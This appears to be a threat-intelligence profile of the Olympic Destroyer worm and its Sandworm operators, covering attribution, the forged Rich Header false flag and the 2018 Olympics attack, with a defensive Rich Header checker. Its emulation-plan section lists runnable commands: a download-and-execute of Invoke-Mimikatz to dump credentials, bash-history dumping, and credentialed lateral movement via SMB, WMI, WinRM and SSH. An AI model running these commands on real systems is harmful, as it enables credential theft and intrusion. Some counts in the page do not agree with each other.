Threat Actor

Olympic Destroyer

olympic_destroyer · russia_apt_sandworm · active since 2017-11

Olympic Destroyer (canonical Kaspersky-Talos malware naming for the destructive self-propagating worm deployed against the February 9, 2018 PyeongChang Winter Olympics opening ceremony, per the Cisco Talos Warren Mercer + Paul Rascagneres canonical February 12, 2018 disclosure "Olympic Destroyer Takes Aim At Winter Olympics" + the Kaspersky GReAT canonical March 2018 false-flag unmasking analysis; Kaspersky "Hades" actor naming for the operators per the Securelist December 2018 "Hades, the actor behind Olympic Destroyer is still alive" follow-up) is Sandworm Team's (Russian GRU Unit 74455, also Mandiant APT44 / Microsoft Seashell Blizzard, curated separately as the sandworm_team parent operator) signature false-flag destructive cyberweapon, operationally the most sophisticated publicly-documented false-flag operation in industry-tracked cyber-operation history.

Cluster-defining multi-attribution-target false-flag tradecraft included a forged Rich Header (the automatically-generated signature) designed to match the DPRK Lazarus Group fingerprint (Kaspersky Igor Soumenkov canonical Rich Header verification mismatch unmasking: "100% confidence this is not Lazarus Group"; "Looking more closely at the malware wiper file headers, he discovered one of the headers had been forged: it didn't belong to Lazarus") + additional false-flag attribution targets including Chinese APT3 + APT10 via code reuse similarity + Russian Sofacy/APT28 via TTP similarity, per Kaspersky Vitaly Kamluk: "They fooled a lot of smart people. They wanted to be discovered. They wanted it to be discovered as Lazarus Group... This was a game-changer".

Standalone malware platform cluster paralleling blackenergy + industroyer + notpetya in the Sandworm-platform-family cell.

Operational attack architecture: pre-positioning November 2017 - February 2018 included IT provider compromise + Atos IT service provider France compromise + a ~5 Sandworm operators spear-phishing campaign impersonating the International Olympic Committee (IOC) + Korean National Counter-Terrorism Centre + the CEO of the timekeeping provider, per Citalid.

Attack execution on February 9, 2018 used 3+ initial infection launchpads (pyeongchang2018.com + ski resort network servers + Atos IT service provider servers per Kaspersky), with the self-propagating worm spreading through Windows network shares via stolen credentials (Mimikatz-like in-memory credential exfiltration + replication tradecraft).

PowerShell Empire agent final payload + Microsoft OneDrive C2 + hardcoded 32-byte ASCII hex alphabet RC4 key payload decryption, per Securelist.

"Light destruction" capability restraint signature per Kaspersky: "By deleting and destroying all local data, they could have easily devastated the Olympic infrastructure. Instead, they decided to do some 'light' destruction", with opening ceremony impact limited to the Olympics website (ticketholders unable to print tickets) + stadium WiFi + display monitors + broadcast systems + ski resort gates/lifts disabled at 2 ski resort hotels + Windows file share wipes + service disables + some systems unbootable + event log resets + backup deletes.

Code links to NotPetya + BadRabbit + the EternalRomance exploit per Cisco Talos Craig Williams analysis + Kaspersky additional verification. Attribution unraveling chain: initial multi-attribution confusion February 2018 - Cisco Talos early false-flag skepticism February 12, 2018 - Kaspersky Igor Soumenkov + Vitaly Kamluk canonical Rich Header verification mismatch unmasking March 2018 - WIRED Andy Greenberg + researcher Matonis Sandworm attribution via Ukrainian LGBT group + US state board of election voter roll targeting code clue convergence - July 2018 US DOJ indictment of 12 GRU hackers for 2016 US election interference identifying GRU Units 26165 + 74455 - Kaspersky December 2018 Hades follow-up - US DOJ October 15, 2020 Scott W. Brady indictment of GRU Unit 74455 officers.

Per Andy Greenberg via Darknet Diaries Episode 77: "It's quite ironic but in this most-deceptive-ever piece of malware ultimately were the clues that not only identified the perpetrators of this attack as Russian, but also contained in them the identity that would allow the cyber-security community to tie everything from NotPetya to the 2015 and 2016 blackouts in Ukraine to this one group, Sandworm". Olympic Destroyer attribution work operationally tied the entire Sandworm-platform-family cell together.

"Changed the attribution game forever" per Dark Reading + IT Security Guru + Cisco Talos Craig Williams + Andy Greenberg consensus assessment.

Cluster fills the false-flag-operational-tradecraft slot in the Sandworm-platform-family chronology: BlackEnergy 2015 - Industroyer 2016 - NotPetya 2017 - Olympic Destroyer 2018 - Industroyer2 2022.

Continued industry reference status as the canonical illustration of Rich Header forgery vulnerability + the most sophisticated publicly-documented false-flag operation in cyber-operation history through the 2018-2026 period.

russia_apt_sandworm · confidence: high · 12 aliases

Profile

Olympic Destroyer (canonical Kaspersky-Talos malware naming for the destructive self-propagating worm deployed against the February 9, 2018 PyeongChang Winter Olympics opening ceremony; Kaspersky "Hades" actor naming for the operators) is Sandworm Team's signature false-flag destructive cyberweapon, operationally the most sophisticated publicly-documented false-flag operation in industry-tracked cyber-operation history per Kaspersky + Cisco Talos + WIRED Andy Greenberg + Dark Reading analysis. Russian state-sponsored APT attribution via Kaspersky Igor Soumenkov + Vitaly Kamluk canonical March 2018 false-flag unmasking (Rich Header verification mismatch, "100% confidence this is not Lazarus Group") + WIRED Andy Greenberg + Matonis Sandworm attribution via Ukrainian LGBT group + US state board of election voter roll targeting code clue convergence + US DOJ October 15, 2020 indictment of GRU Unit 74455 officers. Standalone malware platform cluster paralleling blackenergy + industroyer + notpetya in the Sandworm-platform-family cell, distinct from the sandworm_team parent operator cluster. Cluster-defining multi-attribution-target false-flag tradecraft: the attackers forged the automatically-generated Rich Header signature in the executable file to match the Lazarus Group fingerprint exactly, designed to be discovered as Lazarus per Kaspersky analysis. Additional false-flag attribution targets included Chinese APT3 + APT10 (via code reuse similarity) + Russian Sofacy/APT28 (via TTP similarity). Per Vitaly Kamluk: "They wanted to be discovered. They wanted it to be discovered as Lazarus Group... This was a game-changer." Per Cisco Talos Craig Williams: "There were several false flags that appear to have been intentionally implanted in Olympic destroyer. It's likely these were planted by our adversary to confuse and mislead the security community."

Operational attack architecture: pre-positioning (November 2017 - February 2018):
  • IT provider compromise + Atos IT service provider France compromise as early as November 2017.
  • ~5 Sandworm operators spear-phishing impersonating IOC + Korean National Counter-Terrorism Centre + CEO of timekeeping provider.
Attack execution (February 9, 2018):
  • 3+ initial infection launchpads (pyeongchang2018.com + ski resort network servers + Atos IT service provider servers).
  • Self-propagating worm via Windows network shares + stolen credentials (Mimikatz-like in-memory credential exfiltration + replication).
  • PowerShell Empire agent final payload + Microsoft OneDrive C2 + RC4-encrypted multi-stage payloads.
  • "Light destruction" payload: Olympics website + stadium WiFi + display monitors + broadcasts + ski resort gates/lifts disabled + Windows file share wipes + service disables + some systems unbootable + event log resets + backup deletes.
Capability restraint signature: per Kaspersky, "By deleting and destroying all local data, they could have easily devastated the Olympic infrastructure. Instead, they decided to do some 'light' destruction." Cluster-defining "light destruction" tradecraft demonstrating a capability restraint pattern.
Signature operational tradecraft
  • Multi-attribution-target false-flag (cluster-defining): forged Rich Header Lazarus fingerprint + APT3/APT10 Chinese code reuse + Sofacy TTP similarities.
  • "Light destruction" capability restraint (cluster-defining): chose limited disruption despite administrative access.
  • Self-propagating worm + credential-driven lateral movement: in-memory credential storage + replication.
  • PowerShell Empire post-exploitation framework: signature post-exploitation tooling.
  • Microsoft OneDrive C2 + RC4 hardcoded key payload decryption: signature multi-stage C2 + payload mechanism.
  • TeleBots backdoor framework adjacent: Sandworm-platform-family codebase coherence.
  • Code links to NotPetya + BadRabbit + EternalRomance: per Talos + Kaspersky.
  • "Changed the attribution game forever": per Dark Reading + IT Security Guru + Cisco Talos analysis.
The cluster fills the false-flag-operational-tradecraft slot in the Sandworm-platform-family chronology: BlackEnergy 2015 - Industroyer 2016 - NotPetya 2017 - Olympic Destroyer 2018 - Industroyer2 2022. Operationally significant as the canonical illustration of Rich Header forgery vulnerability + the most sophisticated publicly-documented false-flag operation in cyber-operation history.

Aliases

12 aliases
  • olympic_destroyer
  • olympic destroyer
  • olympicdestroyer
  • olympic_destroyer_worm
  • hades
  • hades threat actor
  • pyeongchang 2018 olympics cyberattack
  • winter olympics 2018 malware
  • olympic destroyer false flag
  • olympic destroyer lazarus forgery
  • olympic destroyer sandworm
  • olympic destroyer hades

Adversary Emulation Plan

13 steps
Runnable Caldera emulation profile "Worm - Move laterally any way possible". Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command. For authorized red-team / purple-team exercises only.
0 collection T1005 · Data from Local System darwin, linux
Parse SSH config
pip install stormssh && storm list
1 credential-access T1552.003 · Unsecured Credentials: Bash History darwin, linux
Dump history
find ~/.bash_sessions -name '*' -exec cat {} \; 2>/dev/null
2 discovery T1135 · Network Share Discovery windows
View admin shares
Get-SmbShare | ConvertTo-Json
3 discovery T1018 · Remote System Discovery darwin, linux, windows
Collect ARP details
arp -a
Run PowerKatz
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds
5 discovery T1018 · Remote System Discovery windows
Find Hostname
nbtstat -A #{remote.host.ip}
6 discovery T1018 · Remote System Discovery windows
Reverse nslookup IP
nslookup #{remote.host.ip}
Mount Share
net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}
Copy 54ndc47 (SMB)
$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";
9 lateral-movement T1570 · Lateral Tool Transfer windows, darwin, linux
Copy 54ndc47 (WinRM and SCP)
$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;
Start 54ndc47 (WMI)
$node = '''#{remote.host.fqdn}''';
$user = '''#{domain.user.name}''';
$password = '''#{domain.user.password}''';
wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
Start Agent (WinRM)
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;
12 lateral-movement T1021.004 · Remote Services: SSH darwin, linux
Start 54ndc47
scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'

Notable Campaigns

10 campaigns
2020 · US DOJ Indictment of GRU Officers (October 15, 2020)
2018-2026 · Continued Industry Reference Status (2018-2026)
2018-2019 · WIRED Andy Greenberg + Matonis Sandworm Attribution (2018+)
2018 · Olympic Destroyer Opening Ceremony Attack (February 9, 2018)
2018 · Cisco Talos Canonical Disclosure (February 12, 2018)
2018 · Kaspersky Canonical False-Flag Unmasking (March 2018)
2018 · Kaspersky Hades Still Alive Follow-Up (December 2018)
2017-2018 · 5-Operator Sandworm Spear-Phishing Campaign (Pre-Olympics)
2017 · Russia Banned from PyeongChang Olympics (December 5, 2017)
2017 · IT Provider Compromise (November 2017)

Attribution & Reporting

Attributed by
  • Kaspersky GReAT (Igor Soumenkov + Vitaly Kamluk, canonical Rich Header verification mismatch + false-flag unmasking March 2018)
  • Cisco Talos (Warren Mercer + Paul Rascagneres + Craig Williams, canonical February 12 2018 disclosure + false-flag skepticism)
  • WIRED Andy Greenberg (canonical Sandworm attribution journalism + Sandworm book 2019)
  • Darknet Diaries (Jack Rhysider + Matonis-narrated Sandworm attribution episode)
  • Kaspersky Securelist (canonical "Hades, the actor behind Olympic Destroyer is still alive" December 2018 follow-up)
  • Symantec Security Response
  • ESET WeLiveSecurity (canonical TeleBots - Olympic Destroyer codebase analysis)
  • Mandiant / Google Cloud Threat Intelligence Group (APT44 Sandworm canonical tracking)
  • Microsoft Threat Intelligence Center (Seashell Blizzard canonical tracking)
  • CrowdStrike (Voodoo Bear canonical tracking)
  • US Department of Justice (October 15 2020 indictment of GRU officers per Scott W. Brady)
  • Reuters (Jim Finkle, initial Olympic Destroyer malware reporting February 12 2018)
  • threatpost (Christopher Kanaracus, early industry reporting)
  • Cyberlaw CCDCOE Interactive Toolkit (canonical international cyber law case documentation)
  • Citalid (canonical Sandworm operational analysis)
  • Huntress (canonical false flag operational case study)
  • Dark Reading (canonical false-flag industry analysis)
  • TechTarget (canonical false-flag cyberattack research compilation)
  • IT Security Guru (canonical Kaspersky disclosure compilation)
Key reporting
  • Kaspersky GReAT (Igor Soumenkov + Vitaly Kamluk): Olympic Destroyer false-flag canonical unmasking (March 2018), canonical Rich Header forgery analysis
  • Cisco Talos (Warren Mercer + Paul Rascagneres + Craig Williams): Olympic Destroyer Takes Aim At Winter Olympics (February 12, 2018), canonical first technical disclosure with early false-flag skepticism
  • Andy Greenberg (WIRED + Sandworm book 2019): canonical Sandworm attribution chronicle including Olympic Destroyer Matonis attribution work
  • Darknet Diaries Episode 77, Olympic Destroyer: canonical podcast narrative chronicle with Andy Greenberg + Jack Rhysider
  • Kaspersky Securelist: Hades, the actor behind Olympic Destroyer is still alive (December 2018), canonical Hades naming + post-Olympics tracking
  • Reuters (Jim Finkle): Olympic Destroyer malware targeted PyeongChang Games, firms (February 12, 2018), canonical initial industry reporting
  • threatpost (Christopher Kanaracus): Olympic Destroyer Malware Behind Winter Olympics Cyberattack (February 12, 2018)
  • Mandiant / Google Cloud Threat Intelligence Group: APT44 Sandworm canonical tracking including Olympic Destroyer
  • Microsoft Threat Intelligence Center: Seashell Blizzard canonical Sandworm tracking
  • CrowdStrike: Voodoo Bear canonical tracking
  • ESET WeLiveSecurity: TeleBots backdoor framework codebase analysis including Olympic Destroyer code links
  • Symantec Security Response: Olympic Destroyer technical analysis
  • Huntress: What Is a False Flag?, Olympic Destroyer canonical case study
  • Dark Reading: Olympic Destroyer's 'False Flag' Changes the Game
  • TechTarget SearchSecurity: Olympic Destroyer was a false flag cyberattack, research claims
  • IT Security Guru: The Olympic False Flag, canonical Kaspersky disclosure compilation
  • Cyberlaw CCDCOE Interactive Toolkit: Olympic Destroyer (2018) canonical international cyber law case documentation
  • Citalid: Computer Sabotage Of The Olympic Games, canonical Sandworm operational analysis
  • US Department of Justice (Scott W. Brady): October 15, 2020 indictment including Olympic Destroyer
  • MITRE ATT&CK Software S0365: Olympic Destroyer
  • Malpedia Software Profile: Olympic Destroyer

Operational

State sponsor

Russian state-sponsored APT, specifically Sandworm Team (GRU Unit 74455, also Mandiant APT44 / Microsoft Seashell Blizzard / Kaspersky "Hades" actor naming, curated separately as the sandworm_team parent operator cluster).

Attribution chain (canonical false-flag unraveling):

(1) Initial multi-attribution confusion (February 2018): per Kaspersky + Dark Reading + TechTarget, "no other sophisticated malware has had so many attribution hypotheses put forward as the Olympic Destroyer." Researchers initially attributed Olympic Destroyer to various candidates including DPRK Lazarus Group (most prominent, based on the Rich Header fingerprint), Chinese APT3 + APT10 (based on malware similarity), Iranian actors, and Russian Sofacy/APT28.

(2) Kaspersky Igor Soumenkov canonical Rich Header verification mismatch (March 2018): per IT Security Guru + Securelist + Dark Reading, Igor Soumenkov (Kaspersky GReAT principal security researcher) noticed the Rich Header fingerprint forgery. Per Soumenkov: "We have 100% confidence this is not Lazarus Group." Per analysis: "Looking more closely at the malware wiper file headers, he discovered one of the headers had been forged: it didn't belong to Lazarus. That header was proof that the attackers had tried to hide behind the Lazarus malware as a false flag operation." Per Vitaly Kamluk (Kaspersky Asia Pacific Research Team head): "They fooled a lot of smart people. They wanted to be discovered. They didn't clean up after themselves and made the malware easily discoverable. They wanted it to be discovered as Lazarus Group... They were not just relying on simulation of Lazarus Group. This was a game-changer." Per Kaspersky researcher conclusion: "To our knowledge, the evidence we were able to find was not previously used for attribution. Yet the attackers decided to use it, predicting that someone would find it." The Rich Header is an automatically-generated signature stored in executable files; the combination of features it records can identify malware authors and projects. The attackers forged these automatically generated signatures to perfectly match the Lazarus Group fingerprint.
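A Rich Header consistency check, added here as an example (it is not code from this page, Kaspersky or Talos): it decodes the XOR-masked header the Microsoft linker writes between the DOS stub and the PE signature, recomputes the key from the DOS header bytes and the decoded entries, and reports whether the stored key still matches them. The PE prefixes and entry values it runs on are constructed inline and are not taken from any real sample.

```python
"""Rich Header consistency check for PE files (added example, constructed data).
The Microsoft linker stores (tool id, build, count) entries XOR-masked with a
32-bit key that is also a checksum over the DOS header bytes and the decoded
entries; an edited entry or a header pasted into a file with a different DOS
stub leaves a key that no longer matches."""
import struct

DANS = 0x536E6144  # "DanS" start marker, stored XOR-ed with the key
RICH = b"Rich"     # end marker, stored in clear, followed by the key


def rol32(value, count):
    """Rotate a 32-bit value left; count is reduced mod 32 like x86 ROL."""
    count &= 31
    return ((value << count) | (value >> (32 - count))) & 0xFFFFFFFF


def parse_rich_header(data):
    """Return (dans_offset, key, [(comp_id, count), ...]) or None."""
    if len(data) < 0x40:
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    rich_off = data.rfind(RICH, 0, min(e_lfanew, len(data)))
    if rich_off < 0 or rich_off + 8 > len(data):
        return None
    key = struct.unpack_from("<I", data, rich_off + 4)[0]
    # Step back one dword at a time until the masked "DanS" marker appears.
    dans_off = next((o for o in range(rich_off - 4, -1, -4)
                     if struct.unpack_from("<I", data, o)[0] ^ key == DANS), None)
    if dans_off is None:
        return None
    # DanS is followed by three padding dwords (0 XOR key); entries come after.
    # comp_id packs the tool product id (high 16 bits) and its build (low 16).
    entries = []
    for off in range(dans_off + 16, rich_off - 7, 8):
        comp_id, count = struct.unpack_from("<II", data, off)
        entries.append((comp_id ^ key, count ^ key))
    return dans_off, key, entries


def rich_checksum(data, dans_off, entries):
    """Recompute the key the linker would have produced for these bytes."""
    cksum = dans_off
    for i in range(dans_off):
        if 0x3C <= i < 0x40:  # e_lfanew is excluded from the sum
            continue
        cksum += rol32(data[i], i)
    for comp_id, count in entries:
        cksum += rol32(comp_id, count)
    return cksum & 0xFFFFFFFF


def verify_rich_header(data):
    """Return (consistent, stored_key, computed_key, entries)."""
    parsed = parse_rich_header(data)
    if parsed is None:
        return (False, None, None, [])
    dans_off, key, entries = parsed
    computed = rich_checksum(data, dans_off, entries)
    return (key == computed, key, computed, entries)


def build_sample(entries, tamper=False):
    """Constructed input: MZ header + DOS stub + Rich Header + 'PE\\0\\0'.
    tamper=True bumps the first entry's build after the key was fixed,
    mimicking an edit made without recomputing the checksum."""
    dos = bytearray(128)
    dos[0:2] = b"MZ"
    stub = b"This program cannot be run in DOS mode.\r\r\n$"
    dos[0x40:0x40 + len(stub)] = stub
    dans_off = len(dos)
    struct.pack_into("<I", dos, 0x3C, dans_off + 16 + 8 * len(entries) + 8)
    key = rich_checksum(bytes(dos), dans_off, entries)
    rich = bytearray(struct.pack("<IIII", DANS ^ key, key, key, key))
    for comp_id, count in entries:
        rich += struct.pack("<II", comp_id ^ key, count ^ key)
    rich += RICH + struct.pack("<I", key)
    if tamper:
        comp_id, count = entries[0]
        struct.pack_into("<II", rich, 16, (comp_id + 1) ^ key, count ^ key)
    return bytes(dos) + bytes(rich) + b"PE\0\0"


SAMPLE_ENTRIES = [(0x00010000 | 0x1F7A, 12), (0x00050000 | 0x2C3D, 3)]  # constructed
```

A header copied byte-for-byte from another binary with the same standard DOS stub still passes this arithmetic, so a matching key only rules out careless editing; the tool versions the entries record must still be reconciled with the rest of the binary.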

(3) Cisco Talos February 12, 2018 false-flag skepticism (early indication): per TechTarget, Talos researchers noted "actual culprits could have added the file name check, and mimicked the wiper function simply in order to implicate the Lazarus group and potentially distract from their true identity." Per Craig Williams (Cisco Talos Outreach director): "There were several false flags that appear to have been intentionally implanted in Olympic destroyer. It's likely these were planted by our adversary to confuse and mislead the security community." Talos additionally described code similarities to NotPetya + BadRabbit + the EternalRomance exploit, per Talos + Kaspersky.

(4) WIRED Andy Greenberg + Darknet Diaries canonical Matonis Sandworm attribution: per Darknet Diaries, WIRED's Andy Greenberg + researcher (Matonis) tracked Olympic Destroyer attribution clues that connected to Ukrainian LGBT group targeting + US state board of election voter roll targeting, all pointing to Sandworm. Per Greenberg: "It's quite ironic but in this most-deceptive-ever piece of malware ultimately were the clues that not only identified the perpetrators of this attack as Russian, but also contained in them the identity that would allow the cyber-security community to tie everything from NotPetya to the 2015 and 2016 blackouts in Ukraine to this one group, Sandworm." Olympic Destroyer attribution work operationally tied the entire Sandworm-platform-family cell together: BlackEnergy 2015 + Industroyer 2016 + NotPetya 2017 + Olympic Destroyer 2018.

(5) Kaspersky December 2018 "Hades is still alive" follow-up: per Securelist, Kaspersky tracked continued Hades activity after the 2018 Olympics with financial + non-financial targeting + similar false-flag deception tradecraft.

(6) US DOJ October 15, 2020 indictment: per Citalid + Wikipedia, the US DOJ indictment of 5 GRU officers in October 2020 included their role in Olympic Destroyer (note: the Olympic Destroyer charges cover a smaller subset of the 6 GRU officers indicted in total for NotPetya + BlackEnergy + Olympic Destroyer Sandworm-platform-family operations).

(7) "Changed the attribution game forever": per Dark Reading + IT Security Guru + Cisco Talos analysis, Olympic Destroyer's sophisticated false-flag operation "changed the attribution game forever" by demonstrating that automatically-generated signatures (Rich Headers), previously assumed to be reliable attribution evidence, could be forged.

Operational mission objective: per Citalid, "the attackers' aim was to disrupt the Olympic Games by targeting the most high-profile event of the Games: the opening ceremony." Operationally coordinated with the prior banning of Russia from the PyeongChang Winter Olympics in December 2017 (International Olympic Committee sanction).

Operational attack architecture:

Pre-positioning phase (November 2017 - February 2018):
(1) 5 Sandworm operators spear-phishing campaign: per Citalid, ~5 Sandworm operators sent booby-trapped links impersonating the International Olympic Committee (IOC) + Korean National Counter-Terrorism Centre + the CEO of a timekeeping provider company, targeting Olympic Games stakeholders + providers.
(2) IT provider compromise, November 2017: the company providing the Olympic Games IT network was compromised as early as November 2017. Atos IT service provider in France was also affected per Kaspersky.

Attack execution (February 9, 2018):
(3) 3+ initial infection launchpads: per Kaspersky, pyeongchang2018.com + ski resort network servers + Atos IT service provider servers. From these launchpads the worm self-propagated through Windows network shares.
(4) Self-propagating worm + credential theft: per Kaspersky + Citalid, the malware exfiltrates authenticators, stores them in memory, and replicates via the stolen credentials/passwords, operationally similar to Mimikatz-like credential-driven lateral movement.
(5) "Light destruction" payload execution: per Dark Reading + Kaspersky, the opening ceremony attack took down WiFi at the stadium + the Olympics website (ticketholders couldn't print tickets) + display monitors + broadcast systems. Ski resort gates and lifts were disabled at two ski resort hotels. Kaspersky noted: "the attackers didn't wreak the amount of destruction they could have with the systems they infected and the administrative accounts that [they] had obtained. They wiped files in Windows shares, disabled Windows services, rendered some systems unbootable, reset event logs, and deleted some backups. By deleting and destroying all local data, they could have easily devastated the Olympic infrastructure. Instead, they decided to do some 'light' destruction."

The cluster represents Sandworm's signature false-flag destructive cyberweapon, the generational successor in the Sandworm-platform-family chronology: BlackEnergy 2015 - Industroyer 2016 - NotPetya 2017 - Olympic Destroyer 2018 - Industroyer2 2022.
Motivations
winter_olympics_pyeongchang_2018_opening_ceremony_disruption, russia_banned_from_pyeongchang_2017_retaliation_speculation, most_sophisticated_publicly_documented_false_flag_operational_tradecraft_demonstration, sandworm_signature_destructive_worm_capability, multi_attribution_target_misdirection_lazarus_apt3_apt10_sofacy, light_destruction_demonstrating_capability_restraint_pattern, operational_security_test_of_attribution_misdirection_via_signature_forgery, changing_attribution_game_via_rich_header_forgery_demonstration
Sectors
Regions

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
Behavioral / log (Sigma): 56/60 · 93%
Analytics (MITRE CAR): 32/60 · 53%
Runtime / container (Falco): 4/60 · 6%
File / malware (YARA): 0/60 · 0%
Network (Suricata/Snort): 14/60 · 23%
Vuln scan (Nuclei): 0/60 · 0%

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use.

Tools Used

0 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
  • Microsoft OneDrive payload download
  • Ski resort network servers infected (launchpads)
  • Sofacy/APT28 TTP similarities (false flag)
  • Spear phishing impersonating IOC, Korean CTC, timekeeping CEO

CVEs Exploited

1
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin